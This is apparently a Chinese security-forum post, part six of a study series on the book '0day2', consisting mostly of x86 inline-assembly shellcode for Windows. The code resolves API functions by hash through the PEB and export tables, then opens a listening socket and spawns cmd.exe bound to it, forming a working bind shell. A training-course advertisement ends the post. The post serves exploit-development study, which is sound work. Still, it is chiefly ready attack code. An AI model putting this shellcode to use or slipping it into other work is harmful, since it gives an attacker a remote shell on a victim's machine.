旧书重温:0day2【1】 简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温:0day2【2】 实验:三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温:0day2【3】 详细解读PEB法 查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温:0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温:0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温:0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689
/*
LoadLibraryA function`s hash is 0c917432
CreateProcessA function`s hash is 6ba6bcc9
ExitProcess function`s hash is 4fd18963
WSAStartup function`s hash is 80b46a3d
WSASocketA function`s hash is de78322d
bind function`s hash is dda71064
listen function`s hash is 4bd39f0c
accept function`s hash is 01971eb1
GetProcAddress function`s hash is bbafdf85
Press any key to continue
*/
void bind_shell()
{
//参考以前的代码
__asm
{
CLD
//存储hash
push 0x80b46a3d //WSAStartup
push 0xde78322d //WSASocket
push 0xdda71064 //bind
push 0x4bd39f0c //listen
push 0x01971eb1 //accept
//----------------------以上是ws2_32.dll中的函数
push 0x0c917432 //load
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
//-----------------------以上是kernel32.dll导出的函数
mov esi,esp //esi = hash list 的顶 exitprocess
lea edi,[esi - 0x20] //8个函数 *4 = 0x20 edi 指向 查找到的函数地址写入位置
xor ebx,ebx
mov bh,0x05
sub esp,ebx //抬高堆栈 500h 保护 hash list
mov bx,0x3233 //2 3
push ebx
push 0x5F327377 //_ 2 s w
push esp //ebp = "ws2_32"
xor edx,edx
mov ebx,fs:[edx+0x30] //peb addr
mov ecx,[ebx + 0x0c] // ldr addr
mov ecx,[ecx + 0x1c] // list frist
push edi
push esi
next_module:
mov ebp,[ecx+0x08]
mov edi,[ecx+0x20]
mov ecx,[ecx]
cmp [edi + 12*2],dx
jne next_module
pop esi
pop edi
find_lib_functions:
lodsd //esi 所指定的字符 传送如eax
cmp eax,0x01971eb1 //zhenw0
jne find_functions //如果 要查找accept的hash时 要切换dll了
xchg ebp,eax
call [edi - 0x04] // edi - 0x0c 存放这LoadLibraryA的地址
xchg ebp,eax
find_functions:
pushad
mov eax,[ebp+0x3c]
mov ecx,[ebp+eax+0x78]
add ecx,ebp
mov ebx,[ecx+0x20]
add ebx,ebp
xor edi,edi
next_function_loop:
inc edi //zai exp 表中查找 函数
mov esi,[ebx+edi*4]
add esi,ebp
cdq
hash_loop: //计算hash
movsx eax,byte ptr[esi]
cmp al,ah
jz compare_hash //如果到了 函数字符串的 00结尾就 比较hash至
ror edx,7 //右移7
add edx,eax //
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c]
jnz next_function_loop
mov ebx,[ecx+0x24]
add ebx,ebp
mov di,[ebx+2*edi]
mov ebx,[ecx+0x1c]
add ebx,ebp
add ebp,[ebx +4*edi]
xchg eax,ebp
pop edi
stosd
push edi
popad
cmp eax,0x80b46a3d //如果已经查找到最后一个hash了 就不跳转了
jne find_lib_functions
function_call: //函数都找到了 开始 scoket了
int 13 //便于od附加
}
}
CLD
//存储hash
push 0x01971eb1 //accept
push 0x4bd39f0c //listen
push 0xdda71064 //bind
push 0xde78322d //WSASocket
push 0x80b46a3d //WSAStartup
//----------------------以上是ws2_32.dll中的函数
push 0x0c917432 //load
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
//-----------------------以上是kernel32.dll导出的函数
mov esi,esp //esi = hash list 的顶 exitprocess
lea edi,[esi + 0x20] //8个函数 *4 = 0x20 edi 指向 查找到的函数地址写入位置
xor ebx,ebx
mov bh,0x05
sub esp,ebx //抬高堆栈 500h 保护 hash list
mov bx,0x3233 //2 3
push ebx
push 0x5F327377 //_ 2 s w
push esp //ebp = "ws2_32"
xor edx,edx
mov ebx,fs:[edx+0x30] //peb addr
mov ecx,[ebx + 0x0c] // ldr addr
mov ecx,[ecx + 0x1c] // list frist
push edi
push esi
next_module:
mov ebp,[ecx+0x08]
mov edi,[ecx+0x20]
mov ecx,[ecx]
cmp [edi + 12*2],dx
jne next_module
pop esi
pop edi
find_lib_functions:
lodsd //esi 所指定的字符 传送如eax
cmp eax,0x80b46a3d //zhenw0
jne find_functions //如果 要查找accept的hash时 要切换dll了
xchg ebp,eax
call [edi - 0x04] // edi - 0x0c 存放这LoadLibraryA的地址
xchg ebp,eax
find_functions:
pushad
mov eax,[ebp+0x3c]
mov ecx,[ebp+eax+0x78]
add ecx,ebp
mov ebx,[ecx+0x20]
add ebx,ebp
xor edi,edi
next_function_loop:
inc edi //zai exp 表中查找 函数
mov esi,[ebx+edi*4]
add esi,ebp
cdq
hash_loop: //计算hash
movsx eax,byte ptr[esi]
cmp al,ah
jz compare_hash //如果到了 函数字符串的 00结尾就 比较hash至
ror edx,7 //右移7
add edx,eax //
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c]
jnz next_function_loop
mov ebx,[ecx+0x24]
add ebx,ebp
mov di,[ebx+2*edi]
mov ebx,[ecx+0x1c]
add ebx,ebp
add ebp,[ebx +4*edi]
xchg eax,ebp
pop edi
stosd
push edi
popad
cmp eax,0x01971eb1 //如果已经查找到最后一个hash了 就不跳转了
jne find_lib_functions
function_call: //函数都找到了 开始 scoket了
add esi,0x0c
//mov eax,[esi]
//--------------------------------------------------wsastartup(dword,lpwsadata)
//std
//std
push esp
push 0x02
lodsd
call eax
// eax = 0 可以使用eax填充数据
//-------------------------------------------------WSASocketA(af,type ...)
mov ecx,0x50
mov edi,esp
rep stosd
inc eax //eax = 1
push eax
inc eax
push eax
lodsd
call eax
xchg ebp,eax // ebp = socket handle
//--------------------------------------------------------bind
mov eax,0x0a1aff02
xor ah,ah
push eax
push esp
call_loop: // bind() listen() accept() dou zai zhe li
push ebp
lodsd
call eax
test eax,eax
jz call_loop
//初始化,startpinfo
inc byte ptr [esp+0x2d]
lea edi,[esp+0x38]
stosd
stosd
stosd
pop eax
push esp
push esp
push eax
push eax
push eax
push esp
push eax
push eax
//int 3
//////////cmd
mov dword ptr [esi],0x646d63
push esi
///////////////
push eax
call [esi-0x1c]
call [esi-0x20]
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
